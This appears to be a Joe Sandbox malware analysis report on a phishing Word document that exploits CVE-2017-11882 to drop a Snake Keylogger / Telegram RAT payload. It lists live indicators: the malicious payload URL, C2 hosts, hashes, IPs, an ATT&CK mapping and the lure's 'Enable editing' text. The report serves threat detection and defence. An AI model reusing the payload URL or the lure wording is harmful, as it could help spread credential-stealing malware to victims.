Source: Yara match	File source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	111 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	42%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\mpoom39002.scr	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
dukeenergyltd.top	26%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://dukeenergyltd.top/	25%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dukeenergyltd.top	172.67.134.136	true	true	26%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.6.168	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://dukeenergyltd.top/mpoom.scr	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dukeenergyltd.top/mpoom.scrj	EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	mpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	false		high
https://dukeenergyltd.top/	EQNEDT32.EXE, 00000002.00000002.344727148.000000000035D000.00000004.00000020.00020000.00000000.sdmp	false	25%, Virustotal, Browse	unknown
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dukeenergyltd.top/mpoom.scrjjC:	EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org/q	mpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://dukeenergyltd.top/mpoom.scrsoC:	EQNEDT32.EXE, 00000002.00000002.344727148.0000000000373000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://checkip.dyndns.org	mpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610871385.0000000002609000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.user	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.com	mpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	mpoom39002.scr, 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false
172.67.134.136	dukeenergyltd.top	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430108
Start date and time:	2024-04-23 07:49:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@7/10@3/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 98% Number of executed functions: 94 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 2160 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:49:54	API Interceptor	267x Sleep call for process: EQNEDT32.EXE modified
07:49:57	API Interceptor	4748x Sleep call for process: mpoom39002.scr modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.6.168	0FvHGK2cyk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	UbMsBrTi5s.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PROFORMA FATURA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
172.67.134.136	03224.doc	Get hash	malicious	AgentTesla	Browse
172.67.134.136	Payment_Advice.doc	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dukeenergyltd.top	NEW ORDER.doc	Get hash	malicious	HTMLPhisher	Browse	104.21.25.202
	MV SUN OCEAN BUNKER INV.doc	Get hash	malicious	AgentTesla	Browse	104.21.25.202
	RFQ.doc	Get hash	malicious	Unknown	Browse	104.21.25.202
	03224.doc	Get hash	malicious	AgentTesla	Browse	172.67.134.136
	PO881620-2024.doc	Get hash	malicious	Remcos	Browse	104.21.25.202
	PROFORMA INVOICE.doc	Get hash	malicious	Unknown	Browse	104.21.25.202
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.13423.15596.rtf	Get hash	malicious	Unknown	Browse	104.21.25.202
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.12949.24049.rtf	Get hash	malicious	Unknown	Browse	104.21.25.202
	Payment_Advice.doc	Get hash	malicious	Unknown	Browse	172.67.134.136
checkip.dyndns.com	order.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	0FvHGK2cyk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.6.168
	M0uVrW4HJb.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	sample1.exe	Get hash	malicious	SeclesBot, TrojanRansom	Browse	132.226.247.73
	UbMsBrTi5s.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	pGTQLD9ukH.elf	Get hash	malicious	Mirai	Browse	193.122.239.120
	pJNcZyhUh8.elf	Get hash	malicious	Mirai	Browse	193.122.239.110
	g2PqnVy6cQ.elf	Get hash	malicious	Mirai, Okiru	Browse	144.25.156.10
	b3astmode.x86.elf	Get hash	malicious	Unknown	Browse	168.138.235.164
	order.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	KSRRrEMt1w.elf	Get hash	malicious	Mirai	Browse	147.154.227.149
	4QuhksnsA6.elf	Get hash	malicious	Unknown	Browse	130.61.64.122
	https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1	Get hash	malicious	Unknown	Browse	192.29.14.118
	u2.bat	Get hash	malicious	Bazar Loader, Qbot	Browse	138.1.33.162
	0FvHGK2cyk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.6.168
CLOUDFLARENETUS	https://universewild.org	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpU	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://myidealwedding.com.au	Get hash	malicious	BitRAT, HTMLPhisher	Browse	104.17.25.14
	QUOTE RNP002673CC1F68.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.html	Get hash	malicious	HTMLPhisher	Browse	104.18.2.35
	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://getpornoliwbstfenx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.18.11.207
	hfGA6tjyxY.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.18.240

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	172.67.134.136
	New Quotation.doc	Get hash	malicious	AgentTesla	Browse	172.67.134.136
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	172.67.134.136
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.134.136
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.134.136
	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Get hash	malicious	PureLog Stealer, zgRAT	Browse	172.67.134.136
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.134.136
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.134.136
	CTM REQUEST BIRTHSHIP.doc	Get hash	malicious	AgentTesla	Browse	172.67.134.136
	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse	172.67.134.136

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	331264
Entropy (8bit):	7.627305719102204
Encrypted:	false
SSDEEP:	6144:rOj1a7g+3FrDC0X4mowIsa8IaG8VdKmR5gwJgbDjamdLW9tHQB:q07g+3lv4mowAMJJgbDjamdLWQ
MD5:	37383DB5D0AAF3A258780342654AE739
SHA1:	67C7CCFF56B2CE1C9ED11B18507557077CDC07D9
SHA-256:	69F201E15280F32573FFDAFDE0CF139DEADCB9FA7D56BFD733B67F795560FEA4
SHA-512:	93D2CFB22EC9F8CA3D0E75995753AF0143ABB700333F4D1FA2C89AF369ABA1EF84041B2AE41047D5DED9A328B4C5E59CAE81F3F23CC7ABDA323BD2DB8DBC74B0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............. ... ...@....@.. ....................................@.................................. ..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........................................................................(.......r...ps....}.....s....}....r..{.....o......{.....o.....V..{....o .....o!...&".(......(#........(&...~....(....o'...o(....#......J.~....t)...()...&&.(......"........0............{.....+...0..9.........{.....{....o.......{....o.......{....o....}..........z...........!4.......0..4.........{.....{....o.......{....o......{....o....&......z........./.......0..E..........i. ....(....r...po...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F038898-13C8-4096-9A4F-B491A2488798}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{46F363FE-A7DD-406F-B1C8-7F7D7988C666}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B7378A9E-77CE-4569-96A5-44AF778C0CBC}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	61952
Entropy (8bit):	3.624259440720678
Encrypted:	false
SSDEEP:	768:jgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g0ON85:oSyemuSyemuSyemyN8ToQ7OMus
MD5:	BAA24A774E0BADCB35F9BF233587A06E
SHA1:	ABBF95BC27A25FA319E71C59DF5CCB013F0D375C
SHA-256:	46E2D4310F7C18BA282FAA3F626D22BED15FD2DBFA185882C3BD86D8EC2EB101
SHA-512:	83274DB8E20DCCEA75E196BB85E5C116B802C6E6C5E6AECC4DC0CBEC7CD30BB20C372CED080473D0CA141A15338A21746E2428B13C588ACB4EE217F6CA56BAF2
Malicious:	false
Reputation:	low
Preview:	7.8.4.7.2.1.6.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .t.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C64928E2-7CB9-43A4-ADFC-459F6DAC0FA3}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3560167139182788
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbI:IiiiiiiiiifdLloZQc8++lsJe1Mz3/
MD5:	B26F1521ACF9ABE833D567E6534A139A
SHA1:	1AE73A78FF4EF7E4F144D0293E5192949D41114C
SHA-256:	4C5B20D1155954E5D26B7A76DE6B35A4C7BA6148AADDDC5C671555D0FDDF3E52
SHA-512:	CE5E2C6D45F47223A83A816A8047CB633C06743A4D5F1650A86D4BF0697696E705D15856B0C822BD894D430D101CB6E7E018964D44CAFA31800C5BD0EB33AA3A
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Tue Apr 23 04:49:52 2024, length=212028, window=hide
Category:	dropped
Size (bytes):	1189
Entropy (8bit):	4.547298904247192
Encrypted:	false
SSDEEP:	24:8aVX/XTzUc986JrtA2o0ehe8dJfQtA2o02Dv3qaik7N:8ax/XTYcC6JrtAp0cPdJfQtAp0dNiN
MD5:	8C3014AB4FA907789AB58EB780E73990
SHA1:	B8982001AA3B3662A507E771432F323F923E4120
SHA-256:	0D144BD4F269457067F2461BFD5294B255F0C2DEC213AFF6AB084A7FC16226AC
SHA-512:	3C755E919DC057AA11E45997750299A23A5BE8FC37D87AE16857797F0B56E077DB21DD47A1DB6462915D2ED16479F267188475BD737B4C6CEEA8D00CDA743737
